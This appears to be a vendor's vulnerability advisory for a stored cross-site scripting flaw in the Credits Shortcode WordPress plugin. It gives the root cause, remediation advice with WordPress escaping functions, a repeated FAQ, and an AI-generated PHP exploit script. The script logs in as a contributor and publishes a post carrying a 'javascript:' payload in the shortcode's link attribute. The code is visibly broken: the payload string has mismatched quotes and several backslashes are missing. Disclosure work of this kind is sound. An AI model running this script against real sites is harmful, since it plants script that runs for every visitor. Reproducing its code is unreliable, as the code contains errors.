What is CVE-2026-6256?

CVE-2026-6256 is a stored cross-site scripting (XSS) vulnerability affecting the Credits Shortcode plugin for WordPress, version 1.2 and earlier. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘link’ attribute of the ‘credits’ shortcode.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping on user-supplied attributes in the ‘credits’ shortcode. An attacker can insert a malicious payload into the ‘link’ attribute, which is then stored and executed whenever the affected page is accessed by other users.

Who is affected by this vulnerability?

Authenticated users with contributor-level access or higher are affected, as they can create or edit posts that include the vulnerable shortcode. This means that any site using the Credits Shortcode plugin version 1.2 or earlier is at risk.

How can I check if my site is vulnerable?

To check for vulnerability, verify if the Credits Shortcode plugin is installed and confirm its version. If it is version 1.2 or earlier, your site is vulnerable to CVE-2026-6256.

What is the severity level of this vulnerability?

CVE-2026-6256 has a medium severity level with a CVSS score of 6.4. This indicates that while exploitation requires authenticated access, it poses a significant risk due to the potential for arbitrary script injection.

What are the practical risks of this vulnerability?

Successful exploitation can lead to session hijacking, redirection to malicious sites, or theft of sensitive data. Since the XSS is stored, it can affect all users who visit the compromised page, including site administrators.

How can I fix or mitigate this issue?

To mitigate the risk, users should remove or replace the Credits Shortcode plugin. If removal is not possible, consider implementing a web application firewall (WAF) rule to block malicious input until a patched version is available.

What built-in WordPress functions should be used for sanitization?

The plugin should use WordPress functions such as esc_url() for URL attributes and esc_attr() for general HTML attributes. Additionally, wp_kses() or wp_kses_post() can be used to allow only safe HTML elements and attributes.

What does the proof of concept demonstrate?

The proof of concept illustrates how an authenticated contributor can exploit the vulnerability using the WordPress REST API. It shows how to create a post with a malicious shortcode that executes a JavaScript alert when the post is viewed.

What should I do if I cannot update the plugin immediately?

If immediate updates are not feasible, ensure that user roles are restricted and monitor for any suspicious activity. Implementing a WAF can help protect against potential exploitation until a fix is applied.

How can I stay informed about vulnerabilities like this?

Stay informed by following security advisories from WordPress, subscribing to security mailing lists, and regularly checking the CVE database for updates on vulnerabilities affecting your plugins and themes.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 15, 2026

CVE-2026-6256: Credits Shortcode <= 1.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'link' Shortcode Attribute (source-shortcode)

CVE ID CVE-2026-6256

Plugin source-shortcode

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.2

Patched Version —

Disclosed May 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6256 (metadata-based):

This vulnerability affects the Credits Shortcode plugin for WordPress, version 1.2 and earlier. It allows authenticated attackers with contributor-level access or higher to perform Stored Cross-Site Scripting (XSS) via the ‘link’ attribute of the ‘credits’ shortcode. The CVSS score is 6.4, and the CVSS vector indicates network-based exploitation, low attack complexity, low privileges required, user interaction none, but scope changed (confidentiality and integrity impacts are low). The CWE classification is 79 (Cross-site Scripting).

Root Cause: Based on the CWE-79 classification and the vulnerability description, the root cause is insufficient input sanitization and output escaping on user-supplied attributes within the ‘credits’ shortcode. Specifically, the plugin does not properly sanitize or escape the ‘link’ attribute value before rendering it in the browser. This is a classic stored XSS pattern where user input is stored (via the shortcode, likely in post content or a custom post type) and later displayed to other users without proper neutralization. Since no code diff is available, Atomic Edge research infers that the plugin likely uses echo or print without applying WordPress escaping functions like esc_url(), esc_attr(), or wp_kses() on the ‘link’ attribute. The contributor-level access requirement is met because shortcode attributes can be supplied by users who can create or edit posts (contributors can add shortcodes to their posts).

Exploitation: An authenticated attacker with contributor-level access (or higher) creates or edits a WordPress post. The attacker inserts the ‘credits’ shortcode with a malicious payload in the ‘link’ attribute. For example: [credits link=’javascript:alert(“XSS”)’]This would store the malicious shortcode in the post content. When any user (including administrators or visitors) views the injected post, the browser executes the injected script. The attack vector is the WordPress post editor (admin side) via the classic or block editor, but the shortcode could also be added via REST API, XML-RPC, or WordPress AJAX endpoints that process post content. The specific endpoint depends on how the plugin registers the shortcode. Typical WordPress shortcode attributes are parsed from post content, so exploitation involves creating/updating a post with the malicious shortcode.

Remediation: The fix requires proper sanitization and escaping of the ‘link’ attribute before output. The plugin should use WordPress built-in functions: esc_url() for URL attributes, or esc_attr() for general HTML attribute output. If the attribute is intended to be a URL, esc_url() is appropriate. For other contexts, the plugin should use wp_kses() or wp_kses_post() to allow only safe HTML elements and attributes. Since no patched version is available, users must remove or replace the plugin, or apply a WAF rule.

Impact: Successful exploitation allows an attacker to inject arbitrary JavaScript into WordPress pages. This can lead to session hijacking, redirection to malicious sites, defacement, or theft of sensitive data such as authentication cookies. Because the XSS is stored, it affects every visitor to the compromised page, including administrators. This could lead to privilege escalation if an administrator’s session is compromised.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6256 - Credits Shortcode <= 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'link' Shortcode Attribute

// This PoC demonstrates exploitation via the WordPress REST API.
// An authenticated contributor creates a post with a malicious shortcode.

$target_url = 'https://example.com'; // CHANGE THIS to your target WordPress URL
$username = 'contributor';           // CHANGE THIS to a contributor-level username
$password = 'password';               // CHANGE THIS to the user's password

// Step 1: Authenticate and get cookies
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In',
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'AtomicEdge-PoC/1.0');
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Create a post with malicious shortcode
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . get_nonce($target_url, '/tmp/cookies.txt'), // Assumes nonce is obtainable via REST API (usually via GET /wp-json/)
]);
$payload = [
    'title' => 'Atomic Edge Test Post - CVE-2026-6256',
    'content' => '[credits link="javascript:alert('XSS by Atomic Edge')"]',
    'status' => 'publish',
];
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'AtomicEdge-PoC/1.0');
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 201) {
    echo "[+] Post created successfully. Visit the post to trigger XSS.n";
    $data = json_decode($response, true);
    if (isset($data['link'])) {
        echo "[+] Post URL: " . $data['link'] . "n";
    }
} else {
    echo "[-] Failed to create post. HTTP code: $http_coden";
    echo "Response: " . $response . "n";
    echo "Note: This PoC may fail if the REST API requires a nonce or if the plugin uses a different mechanism. Also ensure the target site has the plugin installed and active.n";
}

// Helper function to extract REST API nonce (simplified)
function get_nonce($url, $cookiejar) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url . '/wp-json/');
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_NOBODY, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    $response = curl_exec($ch);
    curl_close($ch);
    // Parse X-WP-Nonce header if present, otherwise return empty string
    if (preg_match('/X-WP-Nonce: (S+)/i', $response, $matches)) {
        return $matches[1];
    }
    return ''; // Fallback: some endpoints accept empty nonce for contributors
}

Frequently Asked Questions

What is CVE-2026-6256?
Overview of the vulnerability
CVE-2026-6256 is a stored cross-site scripting (XSS) vulnerability affecting the Credits Shortcode plugin for WordPress, version 1.2 and earlier. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘link’ attribute of the ‘credits’ shortcode.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping on user-supplied attributes in the ‘credits’ shortcode. An attacker can insert a malicious payload into the ‘link’ attribute, which is then stored and executed whenever the affected page is accessed by other users.
Who is affected by this vulnerability?
User roles at risk
Authenticated users with contributor-level access or higher are affected, as they can create or edit posts that include the vulnerable shortcode. This means that any site using the Credits Shortcode plugin version 1.2 or earlier is at risk.
How can I check if my site is vulnerable?
Identifying vulnerable installations
To check for vulnerability, verify if the Credits Shortcode plugin is installed and confirm its version. If it is version 1.2 or earlier, your site is vulnerable to CVE-2026-6256.
What is the severity level of this vulnerability?
Understanding the CVSS score
CVE-2026-6256 has a medium severity level with a CVSS score of 6.4. This indicates that while exploitation requires authenticated access, it poses a significant risk due to the potential for arbitrary script injection.
What are the practical risks of this vulnerability?
Impact of successful exploitation
Successful exploitation can lead to session hijacking, redirection to malicious sites, or theft of sensitive data. Since the XSS is stored, it can affect all users who visit the compromised page, including site administrators.
How can I fix or mitigate this issue?
Recommended actions
To mitigate the risk, users should remove or replace the Credits Shortcode plugin. If removal is not possible, consider implementing a web application firewall (WAF) rule to block malicious input until a patched version is available.
What built-in WordPress functions should be used for sanitization?
Proper sanitization methods
The plugin should use WordPress functions such as esc_url() for URL attributes and esc_attr() for general HTML attributes. Additionally, wp_kses() or wp_kses_post() can be used to allow only safe HTML elements and attributes.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an authenticated contributor can exploit the vulnerability using the WordPress REST API. It shows how to create a post with a malicious shortcode that executes a JavaScript alert when the post is viewed.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updates are not feasible, ensure that user roles are restricted and monitor for any suspicious activity. Implementing a WAF can help protect against potential exploitation until a fix is applied.
How can I stay informed about vulnerabilities like this?
Keeping up with security updates
Stay informed by following security advisories from WordPress, subscribing to security mailing lists, and regularly checking the CVE database for updates on vulnerabilities affecting your plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations